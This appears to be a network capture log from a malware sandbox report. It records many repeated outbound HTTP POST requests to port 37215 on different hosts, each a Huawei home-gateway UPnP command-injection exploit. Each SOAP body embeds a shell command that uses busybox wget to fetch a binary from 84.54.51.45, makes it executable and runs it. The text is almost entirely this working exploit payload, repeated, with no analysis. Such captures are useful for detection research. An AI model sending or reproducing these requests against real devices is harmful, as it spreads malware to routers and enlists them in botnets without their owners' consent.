                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1979192.168.2.155420241.154.164.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601489067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1980192.168.2.155437241.214.138.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602473021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1981192.168.2.154922441.210.203.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602497101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1982192.168.2.155375441.128.39.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602530003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1983192.168.2.154356241.86.72.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602612972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1984192.168.2.155675441.145.196.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602655888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1985192.168.2.153633641.49.38.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602655888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1986192.168.2.155924241.121.198.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602673054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1987192.168.2.154157041.117.83.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602704048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1988192.168.2.153780241.167.94.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602724075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
